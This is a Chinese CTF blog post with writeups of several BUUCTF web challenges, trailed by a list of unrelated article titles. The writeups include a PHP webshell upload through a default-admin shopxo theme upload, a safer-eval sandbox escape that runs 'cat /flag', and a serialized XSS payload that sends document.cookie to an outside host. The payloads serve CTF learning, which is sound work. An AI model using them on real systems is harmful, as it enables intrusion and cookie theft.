[VNCTF 2021]Ez_game

打开为通过游戏
手打通关是不可能的

法一:在控制台输入winTimer.Set();

法二:
https://www.sojson.com/jsobfuscator.html
输入winTimer[“endTime”]=99
得到加密,并复制到控制台,回车即可

不可以看全flag,那么就Ctrl和-来放小一点即可

[GKCTF2020]老八小超市儿

做题之前先来小菜:

就知道默认后台就是admin.php,
登入的默认账号密码是admin和shopxo。

输入账号密码
然后就进入到了网站后台
接下来就在应用中心里的应用商店找到主题,然后下载默认主题

我们可以在_static_里面加上一个test.php

把一句话写入压缩包,给他一起传上去。

把马传上去了后就要确定上传路径,回到主页,查看头像那张图片的信息就可以发现(或者查看源码),它的路径里有static,又有default的,跟我们上传的基本一样,基本就可以确定就是这路径了

或者:

/public/static/index/default/test.php ,打开验证一下

http://af230ac6-0877-4907-9494-63938ee208f1.node3.buuoj.cn/public/static/index/default/test.php
连接密码为aa
连接蚁剑

连接成功后发现目录里有flag和flag.hint
打开flag里面是假flag

打开hint
然后尝试的打开root目录,发现权限不够

打开这个标红的auto.sh,发现他60秒运行一次makeflaghint.py的脚本

前往makeflaghint.py查看


进行修改:

然后再等60秒可以再flag.hint查看到flag:

[GKCTF2020]EZ三剑客-EzNode

查看源码:

1.通过/eval?delay=上传一个数字并和60000比较,大的赋值给delay
2.了解到:setTimeout最多只能推迟执行2147483647毫秒(24.8天),超过这个时间会发生溢出,导致回调函数将在当前任务队列结束后立即执行
我们传入一个大于2147483647的值即可
3.百度上去找safer-eval库发现存在漏洞(CVE-2019-10769 )
直接拿来用就行 链接:https://github.com/commenthol/safer-eval/issues/10 漏洞利用如下:

4.下面看到要post一个e(就是要让我们沙盒逃逸
),结合3得:
e=clearImmediate.constructor(“return process;”)().mainModule.require(“child_process”).execSync(“cat /flag”).toString()

下面就来操作吧:

[BJDCTF 2nd]假猪套天下第一

登录抓包:

访问L0g1n.php重新抓包一下

这里告诉我们需要再等99年,然后考虑到那边有一个time参数,应该就是把那个time改的超过9年就行。
加了一堆数字,然后提示需要localhost(本地),添加一个XFF为127.0.0.1就行

认不到,那就换一种方法:

改了client-ip后提示需要从gem-love.com跳转过来,添加一个Referer头就行
现在变成了需要使用Commodo 64浏览器,查一下全称是:Commodore 64,改User-Agent就行。

改完UA以后需要添加一个邮箱,新增一个From参数即可。
最后代理服务器地址需要是y1ng.vip,添加via

得到flag的base64编码,解码即可

[BJDCTF 2nd]xss之光

用GitHack-master扫出index.php得到源码:

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

仅看到是一个反序列化,但是不知道类啊,这就遇到了一个反序列化但没有pop链的情况,所以只能找到php内置类来进行反序列化;又发现有个echo;所以我们最好对有_toString方法的类进行反序列化;在 _toString()的原生类反序列化中,常用的是Error和Exception,Error只适于php7,Exception php5和php7都适用

由于此题是xss,所以只要xss执行window.open()就能把flag带出来,所以直接这样:

<?php
$y1ng = new Exception("<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>
//window.open 是 javaScript 打开新窗口的方法也可以用window.location.href='url'来实现恶意跳转
<?php
$a = new Exception("<script>window.location.href='http://659ddbae-4440-42bd-a588-0eba91823671.node3.buuoj.cn/'+document.cookie</script>");
echo urlencode(serialize($a));
?>或者用alert(document.cookie)直接弹出cookie,但此题不行,可能开了httponly(见附录)。
<?php
$y1ng = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($y1ng));
?>

结果为:

O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A109%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fa0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A31%3A%22%2Froot%2Fsoft%2Fplayground%2Findex.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

访问:

http://659ddbae-4440-42bd-a588-0eba91823671.node3.buuoj.cn/?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A109%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fa0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A31%3A%22%2Froot%2Fsoft%2Fplayground%2Findex.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D


或者用bp

[BJDCTF 2nd]elementmaster


翻译:我是全部118个元素的元素大师!你可能没有感觉,但是放射性射线的症状会无声的杀死你。

查看源码:

发现id处两串十六进制很奇怪,转换一下得到
0x506F2E ==> Po.
0x706870 ==> php

结合上面,脚本:

import requestsurl='http://86512ce4-2a07-43e0-a9f6-edabc83ec7d5.node3.buuoj.cn/'
flag=''
element=['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar','K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br','Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te','I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm','Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn','Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr','Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']for i in element:r=requests.get(url+i+'.php')if r.status_code == 200:flag+=r.text
print (flag)

得到结果And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php
访问得到flag

BUUCTFweb比赛做题记录相关推荐

  1. 2020.9月做题记录

    八月的做题记录因为是暑假所以鸽掉了. 离联赛真的不远了,要继续努力啊qwq- week -1 2020.08.30 2020.08.30 今天考试,修了20+次锅,修的我都没有心情做题了- 然后开始消 ...

  2. 概率期望题(期望 DP)做题记录

    概率期望题(期望 DP)做题记录 P3830 [SHOI2012]随机树 难点在于第二问:生成树的期望深度. 不 wei zhuo 捏,设 \(dp_{i,j}\) 表示已经有了 \(i\) 个叶子结 ...

  3. 数数题(计数类 DP)做题记录

    数数题(计数类 DP)做题记录 CF1657E Star MST 我们称张无向完全图是美丽的当且仅当:所有和 \(1\) 相连的边的边权之和等于这张完全图的最小生成树的边权之和. 完全图点数为 \(n ...

  4. CSDN 第六期编程竞赛做题记录

    CSDN 第六期编程竞赛做题记录 -- CSDN编程竞赛报名地址:https://edu.csdn.net/contest/detail/16 9.18周日闲来无视写一下 csdn 的编程题,每期编程 ...

  5. 退役前的做题记录5.0

    退役前的做题记录5.0 出于某种原因新开了一篇. [CodeChef]Querying on a Grid 对序列建立分治结构,每次处理\((l,mid,r)\)时,以\(mid\)为源点建立最短路树 ...

  6. Regional 做题记录 (50/50)

    写在前面 博主深感自己太弱了QAQ 于是有了一个刷水的想法,Regional的题目还是有很多考查思维的题目,所以这次是乱做50道思考题,可能会顺带做一些水题,这些题的简要题解会写到这篇博文里面,希望能 ...

  7. 2020.7月做题记录

    转眼就到了2020的下半年了-前方仍是一片茫然. 长期计划 prufer 序列 2020.07.02-2020.07.04 Problem Finished P2624 [HNOI2008]明明的烦恼 ...

  8. 退役前的做题记录1.0

    退役前的做题记录1.0 租酥雨最近很懒qwq,具体表现在写题的时候不想发题解了. 但是想想这样也不太好,就决定发个一句话(半句话到几句话不等)题解上来. 2018-09.18-2018-09.28 [ ...

  9. 【Pikachu】漏洞练习平台做题记录+原理解析(2.2)XSS姿势和技巧

    前言 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意. pikach ...

最新文章

  1. 《Redis入门指南(第2版)》一3.2 字符串类型
  2. 如何搭建属于你自己个人知识体系1.0
  3. Python快速教程 尾声
  4. dubbo源码-服务发现
  5. Spark生态之Spark Streaming
  6. does not name a type是什么意思_科普:WSGI 是什么,看完保证懂
  7. 解决TortoiseGit文件夹和文件状态图标不显示问题
  8. log4net配置mysql_使用独立的log4net.config文件配置log4net,将日志记录到Mysql数据库【原创】...
  9. vb连接odbc连接mysql数据库_vb6通过ODBC连接mysql数据库
  10. java详细设计模式有代码
  11. Jmeter性能测试脚本搭建与测试步骤流程
  12. 接口--PCI/PCIE
  13. 便携计算机硬盘,科技:适用于Mac或PC的最佳便携式外置硬盘
  14. Ubuntu下搜狗輸入法不能输入汉字
  15. WPF教程(十二)资源
  16. 聊聊P2P网贷平台的风险【站在平台的角度】
  17. 性能测试指标及测试方法
  18. with recursive用法
  19. EOS智能合约开发(二):EOS创建和管理钱包
  20. 对于拓展欧几里德算法的理解

热门文章

  1. phpexcel删除行_在PHPexcel中删除空行
  2. 谈PLM和ERP的差异比较
  3. 一文读懂IaaS、PaaS、SaaS的含义及区别
  4. 傅里叶级数展开的详细推导和部分证明
  5. Redis是什么?看这一篇就够了
  6. nimi SearchEngin 项目思路及算法
  7. 行车记录仪全国产化电子元件推荐方案
  8. 【错误汇总】PYTHON开发
  9. JAVAWeb学习笔记2020/5/15——JavaScript高级笔记
  10. 【Windows】如何修改远程桌面端口3389